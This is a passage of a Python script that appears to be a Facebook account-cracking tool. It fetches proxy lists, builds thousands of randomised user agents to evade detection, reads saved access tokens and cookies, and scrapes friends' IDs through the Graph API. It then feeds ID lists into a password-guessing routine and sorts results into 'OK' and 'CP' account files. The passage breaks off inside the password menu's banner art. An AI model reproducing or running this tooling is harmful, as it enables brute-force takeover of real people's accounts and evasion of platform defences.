'Mozilla/5.0 (Windows; U; Windows NT 5.) AppleWebKit/53.0.0 (KHTML like Gecko) Chrome/28.0.809.0 Safari/53.0.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.3) AppleWebKit/534.0.2 (KHTML like Gecko) Chrome/22.0.82.0 Safari/534.0.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.3) AppleWebKit/533.2.0 (KHTML like Gecko) Chrome/24.0.886.0 Safari/533.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/533.0.0 (KHTML like Gecko) Chrome/38.0.827.0 Safari/533.0.0', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0.7.3; rv:.) Gecko/20000 Firefox/..0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_6_3 rv:6.0; ES) AppleWebKit/537.2. (KHTML like Gecko) Version/7..3 Safari/537.2.', 'Mozilla/5.0 (Windows; U; Windows NT 6.3) AppleWebKit/536.0.2 (KHTML like Gecko) Chrome/3.0.82.0 Safari/536.0.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.) AppleWebKit/537.0. (KHTML like Gecko) Chrome/2.0.840.0 Safari/537.0.', 'Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/538.0.0 (KHTML like Gecko) Chrome/28.0.899.0 Safari/538.0.0', 'Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/537..2 (KHTML like Gecko) Chrome/39.0.805.0 Safari/537..2', 'Mozilla/5.0 (Windows; U; Windows NT 6.) AppleWebKit/535.0. (KHTML like Gecko) Chrome/35.0.85.0 Safari/535.0.', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0_8_8 rv:3.0; FO) AppleWebKit/535.0.2 (KHTML like Gecko) Version/4..6 Safari/535.0.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/53.0.0 (KHTML like Gecko) Chrome/25.0.853.0 Safari/53.0.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/536..0 (KHTML like Gecko) Chrome/25.0.84.0 Safari/536..0', 'Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/532..2 (KHTML like Gecko) Chrome/33.0.826.0 Safari/532..2', 'Mozilla/5.0 (Windows NT 6.; Win64; x64; rv:5.3) Gecko/20000 Firefox/5.3.3', 'Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/537..0 (KHTML like Gecko) Chrome/27.0.840.0 Safari/537..0']
ugen=['']
cokbrut=[]
ses=requests.Session()
princp=[]
from rich.console import Console
from rich.columns import Columns
wa = Console()
try:
	prox= requests.get('https://api.proxyscrape.com/v2/?request=displayproxies&protocol=socks4&timeout=80000&country=all&ssl=all&anonymity=all').text
	open('.prox.txt','w').write(prox)
except Exception as e:
	print('       \x1b[1;92m       اشترك في القناة')
prox=open('.prox.txt','r').read().splitlines()
for x in range(10000):
    rr = random.randint
    rc = random.choice
    at_ip1 = rc(["605.1.15","534.5.4","531.48.3","533.17.9","535.50.4","535.29.5","532.9","534.14.7"])
    at_ip2 = rc(["8B112","19E258","15E148","15D100","8A293","8B116","8B117","8C148","8C148","17H35","15E148","8B112","21A360","21B77","12A365","12A405","12B410","12B410","12B435","12B440","12B466","11A465","10A406","11A501","11B554a","11D167"])
    at_ip3 = rc(["604.1","6531.48.3","6533.18.5","6535.50.4","6535.29.5","6531.22.7","605.1"])
    model = rc(["bhb-IN","mag-IN","en-us","nan-TW","ro-RO","de-de","yue-HK","en-gb","gl-ES"])
    NO = rc([f'{str(rr(1,10))}.{str(rr(0,4))}.{str(rr(0,4))}',f'{str(rr(1,25))}.0',f'{str(rr(1,25))}'])
    a = rc(['sv_SE','en_GB','en_US','es_MX','th_TH','pl_PL','id_ID'])
    b = rc(['TELKOMSEL','AXIS','Indosat','XL','3SinyalKuatHemat','Tsel-PakaiMasker','XL Axiata'])
    ran = rc(['N4LEFH','TQ2A','QQ1B','PQ1A','SQ3A','RD1B','LDK2WU','SD2A','AB03E','Z367Q','R8638','C886H','R16NW'])
    SM = rc(["E025F", "G996B", "A826S", "E135F", "G781B", "G998B", "F936U1", "G361F", "A716S", "J327AZ", "E426B", "A015F", "A015M", "A013G", "A013G", "A013M", "A013F", "A022M", "A022G", "A022F", "A025M", "S124DL", "A025U", "A025A", "A025G", "A025F", "A025AZ", "A035F", "A035M", "A035G", "A032F", "A032M", "A032F", "A037F", "A037U", "A037M", "S134DL", "A037G", "A105G", "A105M", "A105F", "A105FN", "A102U", "S102DL", "A102U1", "A107F", "A107M", "A115AZ", "A115U", "A115U1", "A115A", "A115M", "A115F", "A125F", "A127F", "A125M", "A125U", "A127M", "A135F", "A137F", "A135M", "A136U", "A136U1", "A136W", "A260F", "A260G", "A260F", "A260G", "A205GN", "A205U", "A205F", "A205G", "A205FN", "A202F", "A2070", "A207F", "A207M", "A215U", "A215U1", "A217F", "A217F", "A217M", "A225F", "A225M", "A226B", "A226B", "A226BR", "A235F", "A235M", "A300FU", "A300F", "A300H", "A310F", "A310M", "A320FL", "A320F", "A305G", "A305GT", "A305N", "A305F", "A307FN", "A307G", "A307GN", "A315G", "A315F", "A325F", "A325M", "A326U", "A326W", "A336E", "A336B", "A430F", "A405FN", "A405FM", "A3051", "A3050", "A415F", "A426U", "A426B", "A5009", "A500YZ", "A500Y", "A500W", "A500L", "A500X", "A500XZ", "A510F", "A510Y", "A520F", "A520W", "A500F", "A500FU", "A500H", "S506DL", "A505G", "A505FN", "A505U", "A505GN", "A505F", "A507FN", "A5070", "A515F", "A515U", "A515U1", "A516U", "A516V", "A516N", "A516B", "A525F", "A525M", "A526U", "A526U1", "A526B", "A526W", "A528B", "A536B", "A536U", "A536E", "A536V", "A600FN", "A600G", "A605FN", "A605G", "A605GN", "A605F", "A6050", "A606Y", "A6060", "G6200", "A700FD", "A700F", "A7000", "A700H", "A700YD", "A710F", "A710M", "A720F", "A750F", "A750FN", "A750GN", "A705FN", "A705F", "A705MN", "A707F", "A715F", "A715W", "A716U", "A716V", "A716U1", "A716B","A725F", "A725M", "A736B", "A530F", "A810YZ", "A810F", "A810S", "A530W", "A530N", "G885F", "G885Y", "G885S", "A730F", "A805F", "G887F", "G8870", "A9000", "A920F", "A920F", "G887N", "A910F", "G8850", "A908B", "A908N", "A9080", "G313HY","G313MY", "G313MU", "G316M", "G316ML", "G316MY", "G313HZ", "G313H", "G313HU", "G313U", "G318H", "G357FZ", "G310HN", "G357FZ", "G850F", "G850M", "J337AZ", "G386T1", "G386T", "G3858", "G3858", "A226L", "C5000", "C500X", "C5010", "C5018", "C7000", "C7010", "C701F", "C7018", "C7100", "C7108", "C9000", "C900F", "C900Y", "G355H", "G355M", "G3589W", "G386W", "G386F", "G3518", "G3586V", "G5108Q", "G5108", "G3568V", "G350E", "G350", "G3509I", "G3508J", "G3502I", "G3502C", "S820L", "G360H", "G360F", "G360T", "G360M", "G361H", "E500H", "E500F", "E500M", "E5000", "E500YZ", "E700H", "E700F", "E7009", "E700M", "G3815", "G3815", "G3815", "F127G", "E225F", "E236B", "F415F", "E5260", "E625F", "F900U", "F907N", "F900F", "F9000", "F907B", "F900W", "G150NL", "G155S", "G1650", "W2015", "G7102", "G7105", "G7106", "G7108", "G7202", "G720N0", "G7200", "G720AX", "G530T1", "G530H", "G530FZ", "G531H", "G530BT", "G532F", "G531BT", "G531M", "J727AZ", "J100FN", "J100H", "J120FN", "J120H", "J120F", "J120M", "J111M", "J111F", "J110H", "J110G", "J110F", "J110M", "J105H", "J105Y", "J105B", "J106H", "J106F", "J106B", "J106M", "J200F", "J200M", "J200G", "J200H", "J200F", "J200GU", "J260M", "J260F","J260MU", "J260F", "J260G", "J200BT", "G532G", "G532M", "G532MT", "J250M", "J250F", "J210F", "J260AZ", "J3109", "J320A", "J320G", "J320F", "J320H", "J320FN", "J330G", "J330F", "J330FN", "J337V", "J337P", "J337A", "J337VPP", "J337R4", "J327VPP", "J327V", "J327P", "J327R4", "S327VL", "S337TL", "S367VL", "J327A", "J327T1", "J327T", "J3110", "J3119S", "J3119", "S320VL", "J337T", "J400M", "J400F", "J400F", "J410F", "J410G", "J410F", "J415FN", "J415F", "J415G", "J415GN", "J415N", "J500FN", "J500M", "J510MN", "J510FN", "J510GN", "J530Y", "J530F", "J530G", "J530FM", "G570M", "G570F", "G570Y", "J600G", "J600FN", "J600GT", "J600F", "J610F", "J610G", "J610FN", "J710F", "J700H", "J700M", "J700F", "J700P", "J700T", "J710GN", "J700T1", "J727A", "J727R4", "J737T", "J737A", "J737R4", "J737V", "J737T1", "J737S", "J737P", "J737VPP", "J701F", "J701M", "J701MT", "S767VL", "S757BL", "J720F", "J720M", "G615F", "G615FU", "G610F", "G610M", "G610Y", "G611MT", "G611FF", "G611M", "J730G", "J730GM", "J730F", "J730FM", "S727VL", "S737TL", "J727T1", "J727T1", "J727V", "J727P", "J727VPP", "J727T", "C710F", "J810M", "J810F", "J810G", "J810Y", "A605K", "A605K", "A202K", "M336K", "A326K", "C115", "C115L", "C1158", "C1158", "C115W", "C115M", "S120VL", "M015G", "M015F", "M013F", "M017F", "M022G", "M022F", "M022M", "M025F", "M105G", "M105M", "M105F", "M107F", "M115F", "M115F", "M127F", "M127G", "M135M", "M135F", "M135FU", "M205FN", "M205F", "M205G", "M215F", "M215G", "M225FV", "M236B", "M236Q", "M305F", "M305M", "M307F", "M307FN", "M315F", "M317F", "M325FV", "M325F", "M326B", "M336B", "M336BU", "M405F", "M426B", "M515F", "M526BR", "M526B", "M536B", "M625F", "G750H", "G7508Q", "G7509", "N970U", "N970F", "N971N", "N970U1", "N770F", "N975U1", "N975U", "N975F", "N975F", "N976N", "N980F", "N981U", "N981B", "N985F", "N9860", "N986N", "N986U", "N986B", "N986W", "N9008V", "N9006", "N900A", "N9005", "N900W8", "N900", "N9009", "N900P", "N9000Q", "N9002", "9005", "N750L", "N7505", "N750", "N7502", "N910F", "N910V", "N910C", "N910U", "N910H", "N9108V", "N9100", "N915FY", "N9150", "N915T", "N915G", "N915A", "N915F", "N915S", "N915D", "N915W8", "N916S", "N916K", "N916L", "N916LSK", "N920L", "N920S", "N920G", "N920A", "N920C", "N920V", "N920I", "N920K", "N9208", "N930F", "N9300", "N930x", "N930P", "N930X", "N930W8", "N930V", "N930T", "N950U", "N950F", "N950N", "N960U", "N960F", "N960U", "N935F", "N935K", "N935S", "G550T", "G550FY", "G5500", "G5510", "G550T1", "S550TL", "G5520", "G5528", "G600FY", "G600F", "G6000", "G6100", "G610S", "G611F", "G611L", "G110M", "G110H", "G110B", "G910S", "G316HU", "G977N", "G973U1", "G973F", "G973W", "G973U", "G770U1", "G770F", "G975F", "G975U","G970U", "G970U1", "G970F", "G970N", "G980F", "G981U", "G981N", "G981B", "G780G", "G780F", "G781W", "G781U", "G7810", "G9880", "G988B", "G988U", "G988B", "G988U1", "G985F", "G986U", "G986B", "G986W", "G986U1", "G991U", "G991B", "G990B", "G990E", "G990U", "G998U", "G996W", "G996U", "G996N", "G9960", "S901U", "S901B", "S908U", "S908U1", "S908B", "S9080", "S908N", "S908E", "S906U", "S906E", "S906N", "S906B", "S906U1", "G730V", "G730A", "G730W8", "C105L", "C101", "C105", "C105K", "C105S", "G900F", "G900P", "G900H", "G9006V", "G900M", "G900V", "G870W", "G890A", "G870A", "G900FD", "G860P", "G901F", "G901F", "G800F", "G800H", "G903F", "G903W", "G920F", "G920K", "G920I", "G920A", "G920P", "G920S", "G920V", "G920T", "G925F", "G925A", "G925W8", "G928F", "G928C", "G9280", "G9287", "G928T", "G928I", "G930A", "G930F", "G930W8", "G930S", "G930V", "G930P", "G930L", "G891A", "G935F", "G935T", "G935W8", "G9350", "G950F", "G950W", "G950U", "G892A", "G892U", "G8750", "G955F", "G955U", "G955U1", "G955W", "G955N", "G960U", "G960U1", "G960F", "G965U", "G965F", "G965U1", "G965N", "G9650", "J321AZ", "J326AZ", "J336AZ", "T116", "T116NU", "T116NY", "T116NQ", "T2519", "G318HZ", "T255S", "W2016", "W2018", "W2019", "W2021", "W2022", "G600S", "E426S", "G3812", "G3812B", "G3818", "G388F", "G389F", "G390F", "G398FN"])
    gt = ['N4LEFH','TQ2A','QQ1B','PQ1A','SQ3A','RD1B','LDK2WU',
    'SD2A','AB03E','Z367Q','R8638','C886H']
    ver, verchrome = rc([f"{str(rr(1,9))}.0.0",f"{str(rr(1,9))}.5.5",f"{str(rr(1,9))}.1.1",f"{str(rr(1,14))}"]), rc([f"{str(rr(30,120))}.0.{str(rr(1000,3800))}.{str(rr(49,180))}",f"{str(rr(20,140))}.0.{str(rr(4200,4999))}.{str(rr(80,190))}",f"{str(rr(10,190))}.0.{str(rr(2800,6999))}.{str(rr(30,230))}"])
    fahmi1 = f"Mozilla/5.0 (Linux; Android {ver}; CPH{str(rr(1800,3800))}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{verchrome} Mobile Safari/537.36"
    fahmi2 = f"Mozilla/5.0 (Linux; Android {ver}; Meizu C3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{verchrome} Mobile Safari/537.36"
    fahmi3 = f"Mozilla/5.0 (Linux; Android {ver}; SUPER-ID Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{verchrome} Mobile Safari/537.36 OPR/{str(rr(10,120))}.0.{str(rr(1299,2990))}.{str(rr(20,120))}"
    fahmi4 = f"Mozilla/5.0 (Linux; Android {ver}; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{verchrome} Mobile Safari/537.36"
    fahmi5 = f"Mozilla/5.0 (Linux; Android {ver}; Redmi {str(rr(1,8))}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{verchrome} Mobile Safari/537.36"
    fahmi6 = f"Mozilla/5.0 (Linux; Android {ver}; RMX{str(rr(1800,3800))}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{verchrome} Mobile Safari/537.36"
    fahmi7 = f"Mozilla/5.0 (Linux; Android {ver}; V{str(rr(1800,3800))}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{verchrome} Mobile Safari/537.36"
    fahmi8 = f"Mozilla/5.0 (Linux; Android {ver}; Vivo 1819) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{verchrome} Mobile Safari/537.36"
    fahmi9 = f'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 YaBrowser/24.1.0.0 Safari/537.36'
    fahmi10 = f'Mozilla/5.0 (iPhone; CPU iPhone OS 17_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 YaBrowser/24.1.4.438.10 YaApp_iOS/2401.4 YaApp_iOS_Browser/2401.4 Safari/604.1 SA/3'
    useragen = rc([fahmi1,fahmi2,fahmi3,fahmi4,fahmi5,fahmi6,fahmi7,fahmi8,fahmi9,fahmi10])
    ugen.append(useragen)

#--------[ GENERATE-USER-AGENT ]----------#
for generate in range(10):
	a=random.randrange(1, 9)
	b=random.randrange(1, 9)
	c=random.randrange(7, 13)
	c=random.randrange(73,100)
	d=random.randrange(4200,4900)
	e=random.randrange(40,150)
	uaku=f'Mozilla/5.0 (Linux; Android {a}.{b}; Pixel {b}) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/{c}.0.{d}.{e} Mobile Safari/537.36'
def uaku():
	try:
		ua=open('bbnew.txt','r').read().splitlines()
		for ub in ua:
			ugen.append(ub)
	except:
		a=requests.get('https://github.com/EC-1709/a/blob/main/bbnew.txt').text
		ua=open('.bbnew.txt','w')
		aa=re.findall('line">(.*?)<',str(a))
		for un in aa:
			ua.write(un+'\n')
		ua=open('.bbnew.txt','r').read().splitlines()
ua = random.choice(["Mozilla/5.0 (Linux; Android 11; CPH2493 Build/RKQ1.201217.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/82.0.1531.64 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/FBAV/411.0.0.13.36;]","Mozilla/5.0 (Linux; Android 10; SM-A700S Build/OPR6.142770.293; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/94.0.2114.112 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/FBAV/348.0.0.12.57;]","Mozilla/5.0 (Linux; Android 9; Oneplus A99831 Build/OPR6.142770.293; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.1518.41 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/FBAV/343.0.0.03.54;]","Mozilla/5.0 (Linux; Android 11; Black Shark 4S Build/SP2A.653342.342; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/95.0.2318.41 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/FBAV/136.0.0.14.72;]","Mozilla/5.0 (Linux; Android 9; 22041219I Build/TP1A.904992.769; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.1431.179 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/FBAV/156.0.0.23.66;]","Mozilla/5.0 (Linux; Android 11; CPH2493 Build/RKQ1.201217.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/93.0.1734.2 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/FBAV/321.0.0.02.33;]","Mozilla/5.0 (Linux; Android 11; SM-A700K Build/SD2A.276412.601; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/95.0.1576.83 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/FBAV/469.0.0.23.21;]","Mozilla/5.0 (Linux; Android 10; Black Shark 4S Build/SP2A.653342.342; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/114.0.139.83 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/FBAV/334.0.0.15.5;]","Mozilla/5.0 (Linux; Android 11; SM-A700K Build/RKQ1.201217.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/108.0.2051.117 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/FBAV/486.0.0.21.67;]","Mozilla/5.0 (Linux; Android 9; SM-A700K Build/RKQ1.201217.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/67.0.78.94 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/FBAV/218.0.0.15.17;]"])

###----------[ WARNA PRINT RICH ]---------- ###
M2 = "[#FF0000]" # MERAH
H2 = "[#00FF00]" # HIJAU
K2 = "[#FFFF00]" # KUNING
B2 = "[#00C8FF]" # BIRU
P2 = "[#FFFFFF]" # PUTIH
###----------[ CEK WARNA TEMA ]---------- ###
try:
	file_color = open("data/theme_color","r").read()
	color_text = file_color.split("|")[0]
	color_panel = file_color.split("|")[1]
except:
	color_text = "[#00C8FF]"
	color_panel = "#00C8FF"
#------------[ INDICATION ]---------------#
id,id2,loop,ok,cp,akun,oprek,lisensiku,tokenku,uid,lisensikuni= [],[],0,0,0,[],[],[],[],[],[]
taplikasi=['no']
cokbrut=[]
method = []
pwpluss,pwnya=[],[]
P = '\x1b[1;97m' # PUTIH
M = '\x1b[1;91m' # MERAH
H = '\x1b[1;92m' # HIJAU
K = '\x1b[1;93m' # KUNING
B = '\x1b[1;94m' # BIRU
U = '\x1b[1;95m' # UNGU
O = '\x1b[1;96m' # BIRU MUDA
N = '\x1b[0m'	# WARNA MATI
#------------[ WARNA-COLOR ]--------------#
P = '\x1b[1;97m'
M = '\x1b[1;91m'
H = '\x1b[1;92m'
K = '\x1b[1;93m'
B = '\x1b[1;94m'
U = '\x1b[1;95m' 
O = '\x1b[1;96m'
N = '\x1b[0m'    
Z = "\033[1;30m"
sir = '\033[41m\x1b[1;97m'
x = '\33[m' # DEFAULT
m = '\x1b[1;91m' #RED +
k = '\033[93m' # KUNING +
h = '\x1b[1;92m' # HIJAU +
hh = '\033[32m' # HIJAU -
u = '\033[95m' # UNGU
kk = '\033[33m' # KUNING -
b = '\33[1;96m' # BIRU -
p = '\x1b[0;34m' # BIRU +
asu = random.choice([m,k,h,u,b])
ses=requests.Session()
#--------------------[ CONVERTER-BULAN ]--------------#
dic = {'1':'January','2':'February','3':'March','4':'April','5':'May','6':'June','7':'July','8':'August','9':'September','10':'October','11':'November','12':'December'}
dic2 = {'01':'January','02':'February','03':'March','04':'April','05':'May','06':'June','07':'July','08':'August','09':'September','10':'October','11':'November','12':'Devember'}
tgl = datetime.datetime.now().day
bln = dic[(str(datetime.datetime.now().month))]
thn = datetime.datetime.now().year
okc = 'OK-'+str(tgl)+'-'+str(bln)+'-'+str(thn)+'.txt'
cpc = 'CP-'+str(tgl)+'-'+str(bln)+'-'+str(thn)+'.txt'
#------------------[ MACHINE-SUPPORT ]---------------#
def alvino_xy(u):
        for e in u + "\n":sys.stdout.write(e);sys.stdout.flush();time.sleep(0.005)
def AMIRj(u):
        for e in u + "\n":sys.stdout.write(e);sys.stdout.flush();time.sleep(0.01)
def clear():
	os.system('clear')
def back():
	login()
	
	import getpass

attemps = 0

#----------------------------User-Pass-----------------------------#




def banner():
	os.system("clear")
	print (f"""
	
	""")
def login():
	banner()
	print(output)
	print('\033[1;37m[\033[1;32m∞\033[1;37m]\033[38;5;46m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[38;5;46m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-')
	print(f'\033[1;37m[\033[1;32m➤\033[1;37m]\033[38;5;46m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;37m[\033[1;32m1\033[1;37m]\033[1;33m FILE \033[1;37m  [صيد من ملف]')
	print('\033[1;37m[\033[1;32m∞\033[1;37m]\033[38;5;46m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[38;5;46m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-')
	print(f'\033[1;37m[\033[1;32m➤\033[1;37m]\033[38;5;46m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;37m[\033[1;32m0\033[1;37m]\033[1;33m EXIT \033[1;31m [تسجيل الخروج]')
	print('\033[1;37m[\033[1;32m∞\033[1;37m]\033[38;5;46m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[38;5;46m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-\033[1;97m-\033[38;5;196m-\033[38;5;46m-\033[1;35m-\033[1;34m-\033[1;33m-\033[1;32m-')
	AMIR= input('\033[1;37m[\033[1;32m➤ \033[1;37m]\033[38;5;46m-\033[38;5;196m-\033[1;35m-\033[1;34m-\033[1;33m Choose ');time.sleep(0.01)
	if AMIR in ['1']:
	   crack_file()
	elif AMIR in ['0']:
		exit()
		os.system('rm -rf .token.txt')
		os.system('rm -rf .cookie.txt')
		print('#DONE LOGOUT ')
		exit()
	else:
		print('# SELECT CORRECTLY ')
		back()
def error():
	print(f'{k}#TRY AGAIN {u}')
	time.sleep(4)
	back()
	
def result():
	os.system('clear')
	banner()
	print(' 1. CP ACCOUNT ')
	print(' 2. OK ACCOUNT')
	print(' 0. EXIT	')
	kz = input('\n Choose : ')
	if kz in ['1','01']:
		try:vin = os.listdir('CP')
		except FileNotFoundError:
			print(' File Not Found')
			time.sleep(3)
			back()
		if len(vin)==0:
			print('You Have No CP Results ')
			time.sleep(2)
			back()
		else:
			cih = 0
			lol = {}
			for isi in vin:
				try:hem = open('CP/'+isi,'r').readlines()
				except:continue
				cih+=1
				if cih<10:
					nom = '0'+str(cih)
					lol.update({str(cih):str(isi)})
					lol.update({nom:str(isi)})
					print('['+nom+'] '+isi+' [ '+str(len(hem))+' Account ]'+u)
				else:
					lol.update({str(cih):str(isi)})
					print('['+str(cih)+'] '+isi+' [ '+str(len(hem))+' Account ]'+u)
			geeh = input('\n   Choose : ')
			try:geh = lol[geeh]
			except KeyError:
				print(' CHOOSE RIGHT OPTION ')
				exit()
			try:lin = open('CP/'+geh,'r').read().splitlines()
			except:
				print('FILE NOT FOUND ')
				time.sleep(2)
				back()
			nocp=0
			for cpku in range(len(lin)):
				cpkuni=lin[nocp].split('|')
				cpkuh=f'  {cpkuni[0]}  {cpkuni[1]}'
				sol().print(cpkuh,style="yellow")
				nocp +=1
			input('[ Click Enter ]')
			back()
	elif kz in ['2','02']:
		try:vin = os.listdir('OK')
		except FileNotFoundError:
			print('File Not Found ')
			time.sleep(2)
			back()
		if len(vin)==0:
			print(' No OK FILE HERE ')
			time.sleep(2)
			back()
		else:
			cih = 0
			lol = {}
			for isi in vin:
				try:hem = open('OK/'+isi,'r').readlines()
				except:continue
				cih+=1
				if cih<100:
					nom = ''+str(cih)
					lol.update({str(cih):str(isi)})
					lol.update({nom:str(isi)})
					print('['+nom+'] '+isi+' [ '+str(len(hem))+' Account ]'+u)
				else:
					lol.update({str(cih):str(isi)})
					print('['+str(cih)+'] '+isi+' [ '+str(len(hem))+' Account ]'+u)
			geeh = input('\n CHOOSE : ')
			try:geh = lol[geeh]
			except KeyError:
				print(' SELECT RIGHT OPTION ')
				exit()
			try:lin = open('OK/'+geh,'r').read().splitlines()
			except:
				print('File Not Found ')
				time.sleep(2)
				back()
			nocp=0
			for cpku in range(len(lin)):
				cpkuni=lin[nocp].split('|')
				cpkuh=f' {cpkuni[0]}  {cpkuni[1]}'
				sol().print(cpkuh,style="green")
				nocp +=1
			input('[ CLICK ENTER 2 BACK ]')
			back()
	elif kz in ['0','00']:
		back()
	else:
		print('SELECT RIGHT OPTION ')
		exit()

def public():
	try:
		token = open('.token.txt','r').read()
		cok = open('.cok.txt','r').read()
	except IOError:
		exit()
	try:
		os.system('clear')
		banner()
		jum = int(input('\x1b[1;97m [+] ENTER THE NUMBERS OF IDZ: '))
	except ValueError:
		
		back()
	if jum<1 or jum>100000000:
		
		back()
	ses=requests.Session()
	yz = 0
	for met in range(jum):
		yz+=1
		kl = input(' [] INPUT ID '+str(yz)+': ')
		uid.append(kl)
	for userr in uid:
		try:
			col = ses.get('https://graph.facebook.com/v2.0/'+userr+'?fields=friends.limit(5000)&access_token='+tokenku[0], cookies = {'cookies':cok}).json()
			for mi in col['friends']['data']:
				try:
					iso = (mi['id']+'|'+mi['name'])
					if iso in id:pass
					else:id.append(iso)
				except:continue
		except (KeyError,IOError):
			pass
		except requests.exceptions.ConnectionError:
			print('#TRY AGAIN ')
			os.system('clear')
	try:
		print(f' [] TOTAL ID: {P}'+str(len(id)))
		print('')
		setting()
	except requests.exceptions.ConnectionError:
		print(f'{u}')
		back()
	except (KeyError,IOError):
		print(f'IF ID IS PUBLIC THEN TRY AGAIN WITH NEW COOKIE OTHRWISE CHECK YOUR ID LINK ')
		time.sleep(3)
		back()
		
def crack_file():
	os.system('clear')
	banner()
	print(output)
	print(' ادخل مسار ملف الايديات لبدئ الصيد...   ')
	o = input('\n \x1b[1;32mENTER FILE PATH : ')
	print('')
	try:lin = open(o).read().splitlines()
	except:
		print('File Not Found')
		time.sleep(2)
		back()
	for xid in lin:
		id.append(xid)
	setting()
	
def setting():
	hu = '3'

	if hu in ['1','1']:
		for tua in sorted(id):
			id2.append(tua)
	elif hu in ['2','2']:
		muda=[]
		for bacot in sorted(id):
			muda.append(bacot)
		bcm=len(muda)
		bcmi=(bcm-1)
		for xmud in range(bcm):
			id2.append(muda[bcmi])
			bcmi -=1
	elif hu in ['3','03']:
		for bacot in id:
			xx = random.randint(0,len(id2))
			id2.insert(xx,bacot)
	else:
		exit()
	hc = '1'

	if hc in ['1','01']:
		method.append('mobile')
	elif hc in ['']:
		print('>> ')
		setting()
		method.append('mbasic')
	else:
		method.append('mobile')
	print('')
		
	
	_jembot_ = 'ya'
	if _jembot_ in ['']:
		print(' ')
		
	elif _jembot_ in ['no','NO']:
		taplikasi.append('ya')
	else:
		taplikasi.append('no')
	pwplus='ya'
	if pwplus in ['no','NO']:
		pwpluss.append('ya')
		pwku=input('>> ENTER YOUR PASS : ')
		pwkuh=pwku.split(',')
		for xpw in pwkuh:
			pwnya.append(xpw)
	else:
		pwpluss.append('no')
		os.system('clear')
		
		
	passwrd() 
def passwrd():
	print(('\033[92m—'*30)+'\033[0;92m'+('—'*30))
	print('''
            ⠀⠀⠀\033[1;32m⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
            ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
            ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
